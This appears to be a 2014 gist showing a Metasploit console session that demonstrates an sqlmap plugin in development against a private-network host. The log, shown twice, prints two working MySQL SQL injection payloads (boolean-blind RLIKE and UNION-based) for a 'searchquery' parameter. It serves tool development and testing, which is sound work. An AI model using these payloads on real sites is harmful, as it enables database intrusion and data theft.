brandonprry · July 4, 2014 03:45
diff --git a/gistfile1.txt b/gistfile1.txt
 bperry@w00den-pickle:~/tools/msf_dev$ ./msfconsole 
  +-------------------------------------------------------+
  |  METASPLOIT by Rapid7                                 |
  +---------------------------+---------------------------+
  |      __________________   |                           |
  |  ==c(______(o(______(_()  | |""""""""""""|======[***  |
  |             )=\           | |  EXPLOIT   \            |
  |            // \\          | |_____________\_______    |
  |           //   \\         | |==[msf >]============\   |
  |          //     \\        | |______________________\  |
  |         // RECON \\       | \(@)(@)(@)(@)(@)(@)(@)/   |
  |        //         \\      |  *********************    |
  +---------------------------+---------------------------+
  |      o O o                |        \'\/\/\/'/         |
  |              o O          |         )======(          |
  |                 o         |       .'  LOOT  '.        |
  | |^^^^^^^^^^^^^^|l___      |      /    _||__   \       |
  | |    PAYLOAD     |""\___, |     /    (_||_     \      |
  | |________________|__|)__| |    |     __||_)     |     |
  | |(@)(@)"""**|(@)(@)**|(@) |    "       ||       "     |
  |  = = = = = = = = = = = =  |     '--------------'      |
  +---------------------------+---------------------------+


       =[ metasploit v4.9.0-dev [core:4.9 api:1.0] ]
 + -- --=[ 1292 exploits - 702 auxiliary - 202 post ]
 + -- --=[ 332 payloads - 33 encoders - 8 nops      ]

 msf > load sqlmap
 [*] Sqlmap plugin loaded
 [*] Successfully loaded plugin: Sqlmap
 msf > sqlmap_connect 192.168.1.45
 [+] Set connection settings for host 192.168.1.45
 msf > sqlmap_get_data b65e0cff889246f3

 Parameter    Title                                                                           Payload
 ---------    -----                                                                           -------
 searchquery  MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)  searchquery=fdsa' RLIKE (SELECT (CASE WHEN (3661=3661) THEN 0x66647361 ELSE 0x28 END)) AND 'YDkw'='YDkw&action=search
 searchquery  MySQL UNION query (NULL) - 1 to 20 columns                                      searchquery=fdsa' UNION ALL SELECT NULL,NULL,CONCAT(0x7165737371,0x4d684f55774f4c4d4346,0x7171716b71),NULL#&action=search

 msf >
	bperry@w00den-pickle:~/tools/msf_dev$ ./msfconsole
	+-------------------------------------------------------+
	\| METASPLOIT by Rapid7 \|
	+---------------------------+---------------------------+
	\| __________________ \| \|
	\| ==c(______(o(______(_() \| \|""""""""""""\|======[*** \|
	\| )=\ \| \| EXPLOIT \ \|
	\| // \\ \| \|_____________\_______ \|
	\| // \\ \| \|==[msf >]============\ \|
	\| // \\ \| \|______________________\ \|
	\| // RECON \\ \| \(@)(@)(@)(@)(@)(@)(@)/ \|
	\| // \\ \| ********************* \|
	+---------------------------+---------------------------+
	\| o O o \| \'\/\/\/'/ \|
	\| o O \| )======( \|
	\| o \| .' LOOT '. \|
	\| \|^^^^^^^^^^^^^^\|l___ \| / _\|\|__ \ \|
	\| \| PAYLOAD \|""\___, \| / (_\|\|_ \ \|
	\| \|________________\|__\|)__\| \| \| __\|\|_) \| \|
	\| \|(@)(@)"""\|(@)(@)\|(@) \| " \|\| " \|
	\| = = = = = = = = = = = = \| '--------------' \|
	+---------------------------+---------------------------+


	=[ metasploit v4.9.0-dev [core:4.9 api:1.0] ]
	+ -- --=[ 1292 exploits - 702 auxiliary - 202 post ]
	+ -- --=[ 332 payloads - 33 encoders - 8 nops ]

	msf > load sqlmap
	[*] Sqlmap plugin loaded
	[*] Successfully loaded plugin: Sqlmap
	msf > sqlmap_connect 192.168.1.45
	[+] Set connection settings for host 192.168.1.45
	msf > sqlmap_get_data b65e0cff889246f3

	Parameter Title Payload
	--------- ----- -------
	searchquery MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE) searchquery=fdsa' RLIKE (SELECT (CASE WHEN (3661=3661) THEN 0x66647361 ELSE 0x28 END)) AND 'YDkw'='YDkw&action=search
	searchquery MySQL UNION query (NULL) - 1 to 20 columns searchquery=fdsa' UNION ALL SELECT NULL,NULL,CONCAT(0x7165737371,0x4d684f55774f4c4d4346,0x7171716b71),NULL#&action=search

	msf >
No results found